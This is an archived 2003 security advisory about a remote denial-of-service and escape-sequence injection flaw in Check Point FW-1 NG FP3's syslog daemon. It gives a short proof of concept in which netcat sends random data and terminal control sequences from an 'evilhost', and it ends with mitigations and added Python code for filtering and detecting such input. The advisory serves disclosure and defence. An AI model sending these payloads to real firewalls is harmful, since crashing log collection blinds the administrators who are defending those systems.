TUCoPS :: Unix :: General :: a6087.htm

Check Point DoS attack against syslog daemon
22nd Mar 2003 [SBWID-6087]
COMMAND
	Check Point DoS attack against syslog daemon
SYSTEMS AFFECTED
	Check Point FW-1 NG FP3 & FP3 HF1
PROBLEM
	Thanks to Peter of (P) & (C) 2003 AERAsec Network Services and
	Security GmbH, advisory :
	
	 http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
	 http://www.aerasec.de/security/index.html?id=ae-200303-064
	
	
	--snip--
	
	* Successful DoS from remote against syslog daemon of Check Point FW-1
	NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
	
	* Syslog messages containing escape sequences directed to the syslog
	daemon of Check Point FW-1 NG FP3 (including HF1 and HF2) remain
	unfiltered and cause strange output behaviour if the log is viewed on
	the console.
	
	--snip--
	
	Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off)
	to redirect incoming syslog messages from remote (e.g. routers) to
	Check Point's SmartTracker logging mechanism. This syslog daemon can be
	crashed from remote and will not start again automatically. Neither
	does a watchdog service detect the crash, nor does an entry about the
	no longer available syslog daemon appear in the SmartView Tracker.
	
	Additionally it will print all chars received in a syslog message from
	remote without any modification. This means escape sequences are
	neither filtered nor e.g. expanded to their octal values in ASCII.
	
	--snip--
	
	 Proof of concept
	 ================
	
	 1
	 =
	
	Start syslog daemon by enabling in the firewall object (and run
	cpstop/cpstart afterwards) or by hand executing:
	
	[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
	Shutting down kernel logger: [ OK ]
	Shutting down system logger: [ OK ]
	Starting system logger: [ OK ]
	Starting kernel logger: [ OK ]
	
	Segmentation fault <- caused after receiving random syslog payload,
	see below
	
	Check for listening syslog daemon:
	
	 [firewall]# netstat -lnptu |grep -w 514
	 udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
	
	
	Note also that this daemon is running as "root":
	
	 # ps -ux | grep -w syslog
	 root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514 all
	
	
	Send a valid syslog message from a remote host (here also a Linux
	system):
	
	 [evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
	
	
	Send random payload via syslog message from a remote host:
	
	 [evilhost]# cat /dev/urandom | nc -u firewall 514
	
	The previously started syslog daemon should crash after a short time;
	use "netstat" to see whether a daemon is still listening on UDP port 514.
	
	Note: for a clean restart of Check Point's syslog daemon the firewall
	service needs to be restarted.
	
	
	 2
	 =
	
	Enable receiving of syslog messages from remote by FW-1, e.g. as
	described above.
	
	View log on console by running following command:
	
	 [firewall]# fw log -nfnl
	
	Send some special escape sequences via syslog, e.g.
	
	[evilhost]# echo -e "<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31mHACKER~ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
	
	
	Take a look at the console again, but don't be scared too much for
	now... Press CTRL-C and reset the console to standard by executing:
	
	 [firewall]# reset
	
	Attackers might send many other "special" escape sequences; for a Linux
	console as destination see "man console_codes" for more.
	
	Note: standard syslog daemon on a RHL 7.3 system treats code like this
	as shown here:
	
	Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
	
SOLUTION
	Solutions to prevent the successful DoS attack against syslog service:
	
	- Upgrade to FP3 HF2 (available since 14 March 2003) as soon as
	possible; for more information see:
	
	 http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html 
	
	
	- Customize your ruleset and accept syslog messages only from dedicated
	(and trusted, see below) senders by the enforcement module
	
	Solutions to prevent unfiltered console output:
	
	- Filter log output by using "tr" like:
	
	 [firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
	
	(all chars with ASCII codes from decimal 0-31 and 128-255 except 10
	for LF are replaced by a '*')
	
	- Update Check Point's syslog daemon to newer version once again, when
	available :
	
	 http://www.checkpoint.com/techsupport/alerts/syslog.html
	
	- Improve ruleset like suggested above.
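
	The following is an added example (not part of the AERAsec advisory or
	of Check Point's code) that implements the console-output filtering
	described under SOLUTION in Python: the same byte policy as the "tr"
	filter, the caret/octal escaping a stock syslogd applies (compare the
	RHL 7.3 output above), and a detector for alerting on senders that
	inject terminal control sequences. The sample datagram is constructed
	after the advisory's payload.

```python
import re

# Constructed sample datagram modelled on the advisory's payload: BEL, then
# CSI sequences that clear the screen and recolour the terminal when echoed raw.
SAMPLE = (b"<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31m"
          b"HACKER ATTACK\033[2;25m\033[22;30m\033[3q")

# ECMA-48 CSI sequence: ESC '[' parameters, intermediates, final byte 0x40-0x7E.
CSI_SEQ = re.compile(rb"\x1b\[[0-9;?]*[ -/]*[@-~]")


def filter_like_tr(msg: bytes) -> str:
    """Same policy as the advisory's tr filter: every byte 0-31 and 128-255
    except LF (10) becomes '*'; printable ASCII (32-126) passes unchanged."""
    out = []
    for b in msg:
        if b == 0x0A or 0x20 <= b <= 0x7E:
            out.append(chr(b))
        else:
            out.append("*")
    return "".join(out)


def escape_like_syslogd(msg: bytes) -> str:
    """Caret notation as a stock syslogd writes it (^G for BEL, ^[ for ESC);
    DEL becomes ^? and bytes >= 128 are written as octal \\ooo, so no raw
    control byte reaches the console."""
    out = []
    for b in msg:
        if b == 0x0A or 0x20 <= b <= 0x7E:
            out.append(chr(b))
        elif b < 0x20:
            out.append("^" + chr(b + 0x40))
        elif b == 0x7F:
            out.append("^?")
        else:
            out.append("\\%03o" % b)
    return "".join(out)


def control_sequences(msg: bytes) -> list:
    """Return the CSI sequences present in a message; a non-empty result is
    a reasonable trigger for flagging the sending host in the log review."""
    return [m.decode("ascii") for m in CSI_SEQ.findall(msg)]


if __name__ == "__main__":
    print(filter_like_tr(SAMPLE))
    print(escape_like_syslogd(SAMPLE))
    print(len(control_sequences(SAMPLE)), "control sequences found")
```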
